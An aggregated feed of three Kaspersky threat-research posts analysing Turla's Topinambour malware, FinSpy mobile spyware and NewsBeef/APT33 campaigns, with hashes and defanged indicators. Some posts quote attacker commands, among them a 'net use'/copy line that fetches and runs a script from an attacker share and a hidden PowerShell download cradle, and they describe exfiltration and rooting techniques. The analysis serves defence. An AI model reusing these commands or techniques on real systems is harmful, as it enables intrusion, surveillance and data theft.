Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 2 óra 51 perc
2019. július 15.

Turla renews its arsenal with Topinambour

Turla, also known as Venomous Bear, Waterbug, and Uroboros, is a Russian speaking threat actor known since 2014, but with roots that go back to 2004 and earlier. It is a complex cyberattack platform focused predominantly on diplomatic and government-related targets, particularly in the Middle East, Central and Far East Asia, Europe, North and South America and former Soviet bloc nations.

2019 has seen the Turla actor actively renew its arsenal. Its developers are still using a familiar coding style, but they’re creating new tools. Here we’ll tell you about several of them, namely “Topinambour” (aka Sunchoke – the Jerusalem artichoke) and its related modules. We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves.

The new modules were used in an active campaign that started at the beginning of 2019. As usual, the actor targeted governmental entities. The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan. Moreover, this actor now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak. Among the control servers there are several legitimate but compromised WordPress websites with the actor’s .php scripts on them.

This time, the developers left some Easter eggs for the targets and researchers. The .NET modules include amusing strings such as “TrumpTower” as an initial vector for RC4 encryption. “RocketMan!” (probably a reference to Donald Trump’s nickname for Kim Jong Un) and “MiamiBeach” serve as the first beacon messages from the victim to the control server.

How Topinambour spreads

To deliver all this to targets, the operators use legitimate software installers infected with the Topinambour dropper. These could be tools to circumvent internet censorship, such as “Softether VPN 4.12” and “psiphon3”, or Microsoft Office “activators”.

The dropper contains a tiny .NET shell that will wait for Windows shell commands from the operators. Using this and SMB shares on rented virtual private servers (VPS), the campaign operators spread the next-stage modules using just “net use” and “copy” Windows shell commands. It’s hard to believe, but SMB still works through public networks.

These campaign-related VPSs are located in South Africa. Interestingly, their external IP addresses start with “197.168”. Possibly these first two bytes are there to mimic LAN addresses that start with “192.168”. Lateral movements in the target’s infrastructure show how familiar the campaign operators are with the IPv6 protocol. Along with IPv4 they use the newer version for shell commands and LAN addresses.

What Topinambour wants from the targets

The purpose of all this infrastructure and modules in JavaScript, .NET and PowerShell is to build a “fileless” module chain on the victim’s computer consisting of an initial small runner and several Windows system registry values containing the encrypted remote administration tool. The tool does all that a typical Trojan needs to accomplish: upload, download and execute files, fingerprint target systems. The PowerShell version of the Trojan also has the ability to get screenshots.

Trojan Command set JavaScript exit upld inst wait dwld .NET #down #upload #timeout #stop #sync PowerShell #upload #down #screen #timeout #stop #sync

Even the command system in the different Trojans is quite similar

Interesting technical features

A plausible hypothesis for developing similar malware in different languages could be to avoid detection: if one version is detected on the victim’s computer, the operators can try an analogue in a different language. In the table below, we compare Trojans in terms of encryption keys in use and initial messages to control servers.

Trojan RC4 encryption key Initial beacon to C2 JavaScript KopiLuwak 01a8cbd328df18fd49965d68e2879433 “bYVAoFGJKj7rfs1M” plus hash based upon Windows installation date .NET TrumpTower RocketMan! PowerShell TimesNewRoman MiamiBeach

For some reason, the developers prefer to entertain targets and researchers instead of randomizing strings

Our analysis of the dropper is based on the sample below:

SHA256 8bcf125b442f86d24789b37ce64d125b54668bc4608f49828392b5b66e364284
MD5 110195ff4d7298ba9a186335c55b2d1f
Compiled 2018.09.10 12:08:14 (GMT)
Size 1 159 680
Original name topinambour.exe

The dropper sample on which our analysis is based implements the following features:

Dropper function Features unpack_p Drops payload to %LOCALAPPDATA%/VirtualStore/certcheck.exe. The “p” in the function name and corresponding resource in the dropper stands for “payload” make_some_noise Gains persistence for payload with a scheduled task that starts every 30 minutes unpack_o Drops the original application that the dropper tries to mimic (such as psiphon3) to %TEMP%/activator.exe and runs it. Here “o” in the function name and corresponding resource in the dropper stands for “original”

The Topinambour authors decided to name the remote shell persistence function “make_some_noise()”

Dropped tiny .NET remote shell

The tiny dropped application gets Windows shell commands from the C2 and silently executes them.

The Topinambour tiny .NET shell first tries to get commands from an external IP, which looks like a LAN, and then continues with possibly infected LAN IPs

The first DWORD (four bytes) received after a TCP request to the C2 is the data size for the following communication. Then the data contained in the next packets will be the Windows shell command to silently execute the application using “cmd.exe /c”. And that’s it – straightforward, simple and useful.

KopiLuwak dropper

This is where the notorious KopiLuwak comes into play. The .NET remote shell silently downloads scripts from the C2 – from the opened SMB share on a remote CELL-C VPS in South Africa to be precise. “Net use” and “copy” Windows shell commands are enough to fulfil the task.

cmd.exe /c net use \\\c$ <user_pass_here> /user:administrator & copy /y \\\c$\users\public\documents\i.js $documents\j.js & $documents\j.js

As a result, the victim is infected with a KopiLuwak obfuscated JavaScript.

Deobfuscated KopiLuwak dropper that puts the RC4 decryption key into the scheduler task for next-stager persistence

Its functions are described in the table below:

Script function Features Create scheduler task Creates a task with the name ProactiveScan, description “NTFS Volume Health Scan”, which runs C:\Users\<user_name_here>\AppData\Roaming\Microsoft\Chkdsk.js with the parameters “-scan Kdw6gG7cpOSZsBeH”, where the parameter is the RC4 decryption key Fingerprint host Saves a set of commands such as systeminfo, net view, tasklist /v, gpresult /z, dir \x22%programfiles%\x5cKaspersky Lab\x22, tracert www.google.com to
%appdata%\Microsoft\x5ct235.dat Drop next JavaScript Drops C:\Users\<user_name_here>\AppData\Roaming\Microsoft\Chkdsk.js

The dropped “Chkdsk.js” decrypts one more script using the RC4 key provided in the dropper’s scheduled task and runs the decrypted code. This final stager is a more complex Trojan, able to parse and execute custom commands from the C2.

The operators get the victim’s data in XML format: every message has a 16-byte signature at the beginning and a victim-specific fingerprint that the developer calls “ridid”.

Constant Bytes Value and features magic 16 Every encrypted message from the infected host starts with this. In the samples described, the magic bytes are ‘bYVAoFGJKj7rfs1M’. ridid 32 Hash value, based on Windows installation date and the aforementioned 16-byte magic value RC4 iv 32 RC4 initial vector to encrypt communication between the target and the C2. In the samples described, the IV value is “01a8cbd328df18fd49965d68e2879433”

Decrypted and deobfuscated target hashing algorithm, based on Windows installation date and 16-byte hardcoded string

The malware communicates with a legitimate compromised WordPress-based website and gets four byte length commands from URL like “http://<legitimate domain>/wp-includes/Requests/Socks.php”. First, the malware beacons to its C2 and gets the command to execute as an answer.

Command Features exit Send “t235.dat” fingerprinting file content with “upl” text in the XML message, delete the file and stop script execution upld Send “t235.dat” content with “upl” text in XML message. If no such file exists, or it’s empty, it sends “opt file no exists or size limit” text in the XML message inst Command format is:
  • – three bytes after command – overall server response length
  • – three following bytes – they are “jss”
  • – Tail – JavaScript to execute

Send ‘good install’ and “t235.dat” content in the XML messages. Save executed JavaScript file as %APPDATA%\Microsoft\ghke94d.jss wait Do nothing dwld Command format is the same as for the “inst” command, but the script from the server will not be executed at once. It saves the decrypted JavaScript as %APPDATA%\Microsoft\awgh43.js and sends ‘success get_parse_command’ in the XML message KopiLuwak JavaScript

The downloaded script takes a binary from the Windows registry and runs it. The registry subkeys and values vary from target to target.

The slightly obfuscated script used to run the payload from registry

It is not completely clear how the registry keys were created; however, the attackers usually use the .NET initial infector for that. In some samples, there is an additional function to get the victim´s MAC address.

This is the end of first “JavaScript” infection chain. Now, let’s also briefly describe the second .NET-based chain.

.NET RocketMan Trojan

We call this Trojan RocketMan after the string the developer uses for beaconing. Another string inside this malware is “TrumpTower”, used as an RC4 encryption initial vector.

This malware reads the C2 IP and port from the registry where it was saved by the previous stager. It processes the following commands from its C2 that are received encrypted over HTTP:

Command Features #down Make HTTP POST request to http://<config_ip>:<config_port>/file to download the file with the provided name to the victim’s computer #upload Make HTTP GET request to http://<config_ip>:<config_port>/update, decrypt server response and upload the file to the server with the provided path and name #timeout Get the pause length from the server command argument and wait #stop Make HTTP GET request to http://<config_ip>:<config_port>/exit, stop the Trojan operation #sync Send encrypted “RocketMan!” string to the server PowerShell MiamiBeach Trojan

Last but not least, the developers behind the Topinambour campaign also used a PowerShell Trojan. This Trojan contains around 450 strings and uses “TimesNewRoman” as the RC4 initial vector to encrypt C2 communications.

This module beacons to its hardcoded C2 with the string “MiamiBeach” using an HTTP POST. The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally, it includes the “#screen” command to take a screenshot.


The reason behind the development of KopiLuwak’s PowerShell and .NET analogues may be simply to minimize detection of the well-known, publicly discussed JavaScript versions. Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer, where only a tiny starter would be left.

It’s a bit surprising, amusing and not entirely clear why the developers have used some seemingly US-related strings such as “RocketMan!”, “TrumpTower” or “make_some_noise”. They are hardly likely to serve as false flags. The usage of KopiLuwak, a well-known and exclusive artefact previously used by the Turla group, makes us attribute this campaign to this actor with high confidence.

Indicators of compromise C2 HTTP GET templates
  • http://<config_ip>:<config_port>/file
  • http://<config_ip>:<config_port>/update
  • http://<config_ip>:<config_port>/exit
Some campaign-related MD5 hashes
  • 47870ff98164155f088062c95c448783
  • 2c1e73da56f4da619c4c53b521404874
  • 6acf316fed472300fa50db54fa6f3cbc
  • 9573f452004b16eabd20fa65a6c2c1c4
  • 3772a34d1b731697e2879bef54967332
  • d967d96ea5d0962e08844d140c2874e0
  • a80bbd753c07512b31ab04bd5e3324c2
  • 37dc2eb8ee56aeba4dbd4cf46f87ae9a
  • 710f729ab26f058f2dbf08664edb3986
Domains and IPs VPSs used as control servers
2019. július 10.

New FinSpy iOS and Android implants revealed ITW

FinSpy is spyware made by the German company Gamma Group. Through its UK-based subsidiary Gamma International Gamma Group sells FinSpy to government and law enforcement organizations all over the world. FinSpy is used to collect a variety of private user information on various platforms. Its implants for desktop devices were first described in 2011 by Wikileaks and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. According to our telemetry, several dozen unique mobile devices have been infected over the past year, with recent activity recorded in Myanmar in June 2019. Late in 2018, experts at Kaspersky looked at the functionally latest versions of FinSpy implants for iOS and Android, built in mid-2018. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, SMS/MMS messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers.

Malware features iOS

FinSpy for iOS is able to monitor almost all device activities, including record VoIP calls via external apps such as Skype or WhatsApp. The targeted applications include secure messengers such as Threema, Signal and Telegram. However, functionality is achieved by leveraging Cydia Substrate’s hooking functionality, so this implant can only be installed on jailbroken devices (iPhone or iPad; iPod has not been confirmed) compatible with iOS 11 and below (newer versions are not confirmed as at the time of the research and implants for iOS 12 has not been observed yet). After the deployment process, the implant provides the attacker with almost unlimited monitoring of the device’s activities.

The analyzed implant contained binary files for two different CPU architectures: ARMv7 and ARM64. Taking into account that iOS 11 is the first iOS version that does not support ARMv7 any more, we presumed that the 64-bit version was made to support iOS 11+ targets.

It looks like FinSpy for iOS does not provide infection exploits for its customers, because it seems to be fine-tuned to clean traces of publicly available jailbreaking tools. Therefore, an attacker using the main infection vector will need physical access in order to jailbreak it. For jailbroken devices, there are at least three possible infection vectors:

  • SMS message
  • Email
  • WAP Push

Any of those can be sent from the FinSpy Agent operator’s terminal.

The installation process involves several steps. First, a shell script checks the OS version and executes the corresponding Mach-O binary: “install64” (64-bit version) is used for iOS 11+, otherwise “install7” (32-bit version) is used. When started, the installer binary performs environmental checks, including a Cydia Subtrate availability check; and if it isn’t available, the installer downloads the required packages from the Cydia repository and installs them using the “dpkg” tool. After that the installer does some path preparations and package unpacking, randomly selects names for the framework and the app from a hardcoded list, deploys components on the target system and sets the necessary permissions. After the deployment process is done, the daemon is started and all temporary installation files are deleted.

The persistence of the implant is achieved by adding “plist” with starting instructions to the /Library/LaunchDaemons path.

All sensitive parameters of the configuration (such as C2 server address, C2 telephone numbers and so on) are stored in the file “84C.dat” or in “PkgConf”, located in a bundle path of the main module. They can be rewritten using operator commands. This filename was used in previous FinSpy versions for different platforms, including Android.

The following list describes all the modules of the analyzed FinSpy version:

Name Format Functionality netwd app Framework, launcher of the core module – FilePrep FilePrep app Core module MediaEnhancer dylib Audio recordings .vpext dylib VoIP calls hooking .hdutils dylib Hiding utilities keys dylib Keylogger SBUtils dylib SpringBoardHooker utilities .chext dylib Messenger tracking hdjm unknown Not observed in detected versions, possibly some type of module for hiding traces of a jailbreak

All the internal strings in the modules, including the installer, are encrypted with a simple xor-based algorithm using the following strings as keys: “NSString”, “NSArray”, “NSDictionary”, “ExtAudioFileRef”.

The core implant module (“FilePrep”) contains 7,828 functions. It controls all the others modules, takes care of HTTP and SMS heartbeats and other service functions. Communication between components is implemented in two ways. The first uses the system’s CPDistributedMessagingCenter, the second is a local HTTP server that receives data requests.

The module “.hdutils” is designed to cover up the tracks of the implant activities on the device. First of all, it configures the processing of all incoming SMS messages. It parses the text looking for specific content and will hide notifications for such messages. Then it sends them to the core module via CPDistributedMessagingCenter (a wrapper over the existing messaging facilities in the operating system, which provides server-client communication between different processes using simple messages and dictionaries). Another hiding feature is to hook the “CLCopyAppsUsingLocation” function in order to remove the core implant module from the displayed list of applications used in Settings geolocation services.

The module “.chext” targets messenger applications and hooks their functions to exfiltrate almost all accessible data: message content, photos, geolocation, contacts, group names and so on. The following messenger applications are targeted:

  • Facebook Messenger (com.facebook.Messenger);
  • Wechat (com.tencent.xin);
  • Skype (com.skype.skype/com.skype.SkypeForiPad);
  • Threema (ch.threema.iapp / ch.threema.iapp.ThreemaShareExtension);
  • InMessage (com.futurebits.instamessage.free);
  • BlackBerry Messenger (com.blackberry.bbm1);
  • Signal (org.whispersystems.signal).

The collected data is submitted to the local server deployed by the main module.

The “keys” module focuses on a different kind of keylogging activity, with multiple hooks that intercept every typed symbol. There are several hooks to intercept the typed unlock password as well as during the change password process. The intercepted password is submitted to the “keys.html” page on the local server, similar to the “.chext” module.

The module “MediaEnhancer” is designed to hook system functions in the “mediaserverd” daemon related to call processing, in order to record calls. The module starts a local HTTP server instance on port 8889 upon initialization, implementing VoIPHTTPConnection as a custom connection class. This class contains a handler for requests to localhost/voip.html that could be made by other components.

The module “.vpext” implements more than 50 hooks used for VoIP calls processed by external messaging apps including:

  • WhatsApp;
  • LINE;
  • Skype (that includes independent Skype for iPad version);
  • Viber;
  • WeChat;
  • KakaoTalk;
  • BlackBerry Messenger;
  • Signal.

These hooks modify functions that process VoIP calls in order to record them. To achieve this, they send a post request with the call’s meta information to the HTTP server previously deployed by the MediaEnhancer component that starts recording.


The Android implant has similar functionality to the iOS version, but it is also capable of gaining root privileges on an unrooted device by abusing the DirtyCow exploit, which is contained in the malware. FinSpy Android samples have been known for a few years now. Based on the certificate data of the last version found, the sample was deployed in June 2018.

The Android implant’s functionality is unlikely to change much, based on the fact that most of the configuration parameters are the same in the old and new versions. The variety of available settings makes it possible to tailor the behavior of the implant for every victim. For example, operators can choose the preferred communication channels or automatically disable data transfers while the victim is in roaming mode. All the configuration data for an infected Android device (including the location of the control server) is embedded in the implant and used afterwards, but some of the parameters can be changed remotely by the operator. The configuration data is stored in compressed format, split into a set of files in the assets directory of the implant apk. After extracting all pieces of data and building the configuration file, it’s possible to get all the configuration values. Each value in the configuration file is stored after the little-endian value of its size, and the setting type is stored as a hash.

For example, the following interesting settings found in the configuration file of the developer build of the implant can be marked: mobile target ID, proxy ip-address, proxy port, phone number for remote SMS control, unique identifier of the installed implant.

As in the case of the iOS implant, the Android version can be installed manually if the attacker has physical access to the device, and by remote infection vectors: SMS messages, emails and WAP Push. After successful installation, the implant tries to gain root privileges by checking for the presence of known rooting modules SuperSU and Magisk and running them. If no utilities are present, the implant decrypts and executes the DirtyCow exploit, which is located inside the malware; and if it successfully manages to get root access, the implant registers a custom SELinux policy to get full access to the device and maintain root access. If it used SuperSU, the implant modifies SuperSU preferences in order to silence it, disables its expiry and configures it to autorun during boot. It also deletes all possible logs including SuperSU logs.

The implant provides access to information such as contacts, SMS/MMS messages, calendars, GPS location, pictures, files in memory and phone call recordings. All the exfiltrated data is transferred to the attacker via SMS messages or via the internet (the C2 server location is stored in the configuration file). Personal data, including contacts, messages, audios and videos, can be exfiltrated from most popular messengers. Each of the targeted messengers has its own unified handling module, which makes it easy to add new handlers if needed.

The full hardcoded list of supported messengers is shown below:

Package name Application name com.bbm BBM (BlackBerry Messenger) com.facebook.orca Facebook Messenger com.futurebits.instamesssage.free InstaMessage jp.naver.line.android Line Messenger org.thoughtcrime.securesms Signal com.skype.raider Skype org.telegram.messenger Telegram ch.threema.app Threema com.viber.voip Viber com.whatsapp WhatsApp

At first, the implant checks that the targeted messenger is installed on the device (using a hardcoded package name) and that root access is granted. After that, the messenger database is prepared for data exfiltration. If necessary, it can be decrypted with the private key stored in its private directory, and any required information can be simply queried:

All media files and information about the user are exfiltrated as well.


FinSpy implants are controlled by the FinSpy Agent (operator terminal). By default, all implants are connected to FinSpy anonymizing proxies (also referred to as FinSpy Relays) provided by Gamma Group. This is done to hide the real location of the FinSpy Master. As soon as the infected target system appears online, it sends a heartbeat to the FinSpy Proxy. The FinSpy Proxy forwards connections between targets and a master server. The FinSpy Master server manages all targets and agents and stores the data. Based on decrypted configuration files, our experts were able to find the different relays used by the victims and their geographical location. Most of the relays we found are concentrated in Europe, with some in South East Asia and the USA.


FinSpy mobile implants are advanced malicious spy tools with diverse functionality. Various configuration capabilities provided by Gamma Group in their product enable the FinSpy terminal (FinSpy Agent) operators to tailor the behavior of each implant for a particular victim and effectively conduct surveillance, exfiltrating sensitive data such as GPS location, contacts, calls and other data from various instant messengers and the device itself.

The Android implant has functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. As for the iOS version, it seems that Gamma´s solution doesn’t provide infection exploits for its customers, as their product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. That might imply physical access to the victim in cases where devices are not already jailbroken. At the same time, multiple features that we haven’t observed before in malware designed for this platform are implemented.

Since the leak in 2014, Gamma Group has recreated significant parts of its implants, extended supported functionality (for example, the list of supported instant messengers has been significantly expanded) and at the same time improved encryption and obfuscation (making it harder to analyze and detect implants), which made it possible to retain its position in the market.

Overall, during the research, up-to-date versions of these implants used in the wild were detected in almost 20 countries. However, assuming the size of Gamma’s customer base, it’s likely that the real number of victims is much higher.

A full set of IOCs, including YARA rules, is available to customers of the Kaspersky Intelligence Reporting service. For more information, contact intelreports@kaspersky.com

2019. július 4.

‘Twas the night before

Recently, the United States Cyber Command (USCYBERCOM Malware Alert @CNMF_VirusAlert) highlighted several VirusTotal uploads of theirs – and the executable objects relating to 2016 – 2017 NewsBeef/APT33 activity are interesting for a variety of reasons. Before continuing, it’s important to restate yet again that we defend customers, and research malware and intrusions, regardless of their source. Accordingly, subscribers to our private APT intelligence reports receive unique and extraordinary data on the significant activity and campaigns of over 100 APTs from all over the world, including this 2016-2017 NewsBeef /APT33 activity.

USCYBERCOM’s VirusTotal executable object uploads appeared in our January 2017 private report “NewsBeef Delivers Christmas Presence”, an examination of a change in the tactics used in spear-phishing and watering hole attacks against Saudi Arabian targets. Two files uploaded by USCYBERCOM are of particular interest. These were first seen Dec 2016 and Jan 2017:

MD5: d87663ce6a9fc0e8bc8180937b3566b9, served as
Detected as BSS:Exploit.Win32.Generic, Trojan-Downloader.Win32.Powdr.a, Trojan-Downloader.MSIL.Steamilik.zzo

MD5: 9b1a06590b091d300781d8fbee180e75, served as
Detected as BSS:Exploit.Win32.Generic, Trojan-Downloader.PowerShell.Agent.ah, DangerousObject.Multi.Generic

In order to share insight into Cyber Command’s highlighted malware and its context, some of our private report’s content will be re-written here. The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016. All of them cover a thread of mid-2015 activity continuing into 2016, then resetting and advancing in 2016 and into 2017. Bear in mind that regardless of current leaks, which do not always present exhaustive information on group participants, activity from the region has had multiple overlaps and presents a confusion of internal dynamics…

NewsBeef Delivers Christmas Presence

Examination of a change in tactics used in spearphishing and watering hole attacks against Saudi Arabian targets

Executive summary

The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities.

In previous campaigns, NewsBeef relied heavily on its namesake technology, the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that includes macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails, links sent over social media/standalone private messaging applications, and watering hole attacks that leverage compromised high-profile websites (some belonging to the SA government). The group changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command and control C2 infrastructure. 

In a nutshell:

  • The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets;
  • BeEF does not appear to be deployed as a part of the current campaign;
  • Compromised government and infrastructure-related websites are injected with JavaScript that geolocates and redirects visitors to spoofed, attacker-controlled web-servers;
  • Improvements in JavaScript injection and obfuscation may extend server persistence;
  • NewsBeef continues to deploy malicious macro-enabled Office documents, poisoned legitimate Flash and Chrome installers, PowerSploit, and Pupy tools
Technical Analysis

The NewsBeef campaign is divided into two main attack vectors, spearphishing and strategic web compromise (watering hole) attacks. The group’s spearphishing component uses malicious, macroenabled, Microsoft Office documents that deliver PowerShell scripts. The scripts download poisoned installers (e.g. Flash, Citrix Client, and Chrome) from an online presence (in at least one case, the group spoofed a legitimate, well-known IT services organization). Once the installer is downloaded to a victim machine, it runs PowerSploit scripts that in turn download and execute a full-featured Pupy backdoor.

On December 25, 2016, the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations. The group sent these documents (or links to them) to targets via email, and over social network and standalone messaging clients.

To compromise websites and servers, the group identified vulnerable sites and injected obfuscated JavaScript that redirected visitors to NewsBeef-controlled hosts (which tracked victims and served malicious content). These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to their targets.

Targets, social engineering, delivery chain

The majority of NewsBeef targets that our researchers have observed are located in SA. Targeting profiles include:

  • Government financial and administrative organizations
  • Government health organizations
  • Engineering and technical organizations
  • One British labor related government organization (targeted multiple times)

The bulk of the targets were affected through strategic web compromises, especially via compromised government servers. However, Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client “outlook.live.com” as well as attachments arriving through the Outlook desktop application. This behavior falls in line with previous NewsBeef operations, where the group used other standalone messaging clients to send malicious links. Interestingly, NewsBeef set up its server using the hosting provider “Choopa, LLC, US”, the same hosting provider that the group used in attacks over the summer of 2016.

The domain “ntg-sa[.]com” appears to be an attempt by the NewsBeef actor to spoof the legitimate Saudi IT services organization, “National Technology Group” (NTG) at, “ntg.com[.]sa”. The malicious documents served at the spoofed website are shown below:

NTG is a legitimate company that provides IT services and support to SA government organizations and communications firms (as well as international financial groups and retailers), making it a high-value identity. Spoofing the identity of an IT service provider is a particularly important asset to threat actors that can abuse the inherent trust of IT organizations to push software (which may appear suspicious if served from another source). NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers.

In December 2016, the following active URLs were served from the spoofed NTG identity. All of the poisoned installers are technologies that an IT support service may be expected to deliver.


In this scenario, the poisoned Flashplayer, Citrix, or Chrome installer drops the file “install.bat”. The batch file runs the PowerShell command:

powershell.exe -w hidden -noni -nop -c “iex(New-Object

The command downloads “eiloShaegae1”, another PowerShell downloader script. This second PowerShell downloader script downloads and runs the payload; a PowerSploit ReflectivePEInjection script, “hxxp://139.59.46[.]154:3485/IMo8oosieVai”.

The script maintains and then decodes a base64 string. This base64 string, is the Pupy backdoor DLL, which is loaded and run in-memory, never touching the disk. This Pupy backdoor immediately communicates with 139.59.46[.1]54 over obfs3, posting collected system data and retrieving commands.

This selection of “The Threebfuscator” for command and control (C2) communications is interesting, because it is an obfuscating protocol used to mask Tor communications. It is possible that the use of obfs3 indicates the attackers’ understanding of its effectiveness against outbound connection monitoring.

Another notable spoofed domain used during this campaign is the “maps-modon[.]club” domain. The domain “maps.modon.gov[.]sa” was compromised in December 2016, and the “maps-modon[.]club” domain created on December 8, 2016. The domain shared the same IP address (45.76.32[.]252) as “ntg-sa[.]com”. Although we did not observe any malicious documents retrieved from that domain, it is likely that the domain served the same documents as ntg-sa[.]com. The filenames of the malicious Office documents (hosted at the spoofed NTG site) are relevant to typical IT and contracting resources and indicate that this scheme relies on effective social engineering tactics related to human resources and IT activities.

In other schemes, the attackers sent macro-enabled Office attachments from spoofed law firm identities (or other relevant service providers) to targets in SA. The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign. Below is a screenshot of a fake legal proposal in Word doc format, containing malicious macros and PowerShell code.

The malicious document follows the same chain as the poisoned Flash player or Chrome Installer:

Compromised servers and injected JavaScript

Starting in October 2016, NewsBeef compromised a set of legitimate servers (shown below), and injected JavaScript to redirect visitors to hxxp://analytics-google[.]org:69/Check.aspx:

The entire list of compromised servers is exclusively Saudi Arabian, and includes organizations from the following industries:

  • Energy services for industrial processes
  • Telecom engineering and implementation services
  • Shipping and logistics
  • Metal engineering and manufacturing
  • Information technology services
  • Cement and building materials

These recent attacks against legitimate servers (when compared to previous NewsBeef activity) indicate that NewsBeef operators have improved their technical skills, specifically their ability to covertly inject JavaScript code into served web pages. Their injection and obfuscation techniques enable the actor to serve the same JavaScript with every page visit to the “watering hole” site as well as increase the difficulty of identifying the malicious JavaScript source on compromised sites.

For example, on a Saudi government website, the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site (the packed and unpacked JavaScript is shown below). The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser, browser version, country of origin, and IP address data to the attacker controlled server “jquerycodedownload[.]live/check.aspx”.

It is likely that this collection of visitor information represents an attempt to limit the number of infections to a specific target subset and reduce the attacker’s operational footprint. Although we did not identify injected JavaScript related to the “analytics-google[.]org/check.aspx” redirections, it is likely that it performed similar data collection and exfiltration (via POST). This technique appears to be an improvement over the simple .JPG beaconing which researchers observed in previous NewsBeef watering hole attacks. Packed JavaScript:

The most trafficked of the compromised sites (which redirect to “jquerycode-download[.]live”) appears to be the government site at “scsb.gov[.]sa/portal/”. A high volume of redirections from the compromised site continues into mid-January 2017.

Below is a list of compromised websites and the associated URL that serves the injected, second layer JavaScript. Note that the JavaScript resource changes on every compromised website among many other referenced JavaScript sources, making it difficult to track down the source of the malicious script per site:



Multiple other relevant sites were compromised and redirecting as well. The Pupy backdoor

Pupy is an open source, multi-platform (Windows, Linux, OSX, Android), multi-function backdoor. The backdoor is mainly written in Python and uses code from other open source attack tools like PowerSploit, Mimikatz, laZagne, etc. Pupy can generate backconnect or bindport payloads in multiple formats: PE executables (x86/x64) for Windows, ELF binary/.so for Linux, reflective DLLs (x86/x64), pure Python files, PowerShell, apk, and Rubber Ducky script (Windows).

The malicious DLL deployed by NewsBeef contains Python code, a Python interpreter, and the MSVC runtime library as well as code that loads the Python interpreter, runs Python code and exports some functions for Python. A configuration string contains base64-encoded Python code (packed with zlib) with transport configuration and information about C2 server addresses.

When initiated, the Python code attempts to retrieve and use SOCKS/HTTP proxy settings from the victim’s computer. The Python code then tries to initiate a reverse connection to the C2 server (139.59.46[.]154:3543) using a TCP protocol with RSA+AES traffic encryption and obfs3 transport using default keys from Pupy sources.

After a successful connection, NewsBeef Pupy sends information about the infected computer and waits for commands (which take the form of modules) from the C2 server. The C2 server can send modules with Python code and compiled Python C extensions. The main functionality of the backdoor is implemented in packages (Python code, compiled Python C extensions, compiled executable files) and modules (Python code). Modules can directly access Python objects on the remote client using the RPyC module. The Python modules win32com, win32api, and ctypes are used to interact with the Win32 API. Attackers can use standard modules or write their own. All modules are executed in the memory (a Pupy process can migrate between processes using the corresponding module).


Previous reports on the NewsBeef APT noted the group’s reliance on open-source tools to launch simple, yet effective attacks. Historically, the group has used BeEF to track targets and deliver malicious payloads. However, as this recent campaign indicates, the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents, PowerSploit, and Pupy. Despite this shift in toolset, the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net.

The improvements in tactics, techniques and procedures appears to have paid off. The most recent campaign indicates that the group was able to compromise a larger number of sites including valuable, high-profile SA government identities. However, despite these improvements in technology, the NewsBeef APT continues to rely on social engineering schemes and open-source tools – attributes that increase the chances of identification.

NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue. Additionally, researchers expect that as the group evolves, its tasking will expand to other organizations doing business with, or connected to Saudi Arabian organizations and individuals.

Due to the group’s specific target set, it is crucial that SA security teams, administrators, and developers (especially web application administrators/developers) update their WordPress, Joomla, and Drupal-based web applications and plugins – as these assets are actively scanned and exploited by this APT.

Appendix Related Object MD5 (executable code, malicious office documents, javascript, powershell, etc)
  • f4d18316e367a80e1005f38445421b1f
  • 638b74a712a7e45efc9bec126b0f2d87
  • 45b0e5a457222455384713905f886bd4
  • 19cea065aa033f5bcfa94a583ae59c08
  • ecfc0275c7a73a9c7775130ebca45b74
  • 1b5e33e5a244d2d67d7a09c4ccf16e56
  • fa72c068361c05da65bf2117db76aaa8
  • 43fad2d62bc23ffdc6d301571135222c
  • ce25f1597836c28cf415394fb350ae93
  • 03ea9457bf71d51d8109e737158be888
  • edfc37461fa66716b53333fd7f841a8e
  • 623e05dd58d86da76fdfcf9b57032168
  • 6946836f2feb98d6e8021af6259a02dd
  • f4d18316e367a80e1005f38445421b1f
  • d87663ce6a9fc0e8bc8180937b3566b9
  • f9adf73bf1cdd7cd278e5137d966ddd4
  • b8373f909fa228c2b6e7d69f065f30fb
  • 9b1a06590b091d300781d8fbee180e75
  • bcafe408567557289003c79f745f7713
  • 45b0e5a457222455384713905f886bd4
  • 83be35956e5d409306a81e88a1dc89fd
  • c2165155fcba5b737ee70354b5244be3
  • 444c93e736194a01bf3b319e3963d746
  • 0ed61b6f1008000c6dfcd3d842b21971
  • 3fb33a2747b39a9b1c5c1e41fade595e
  • b34fd14105be23480c44cfdf6eb26807

Hosting malicious docs, executables, PowerShell and Pupy backdoors

  • moh.com-ho[.]me/Health_insurance_plan.doc
  • moh.com-ho[.]me/Health_insurance_registration.doc
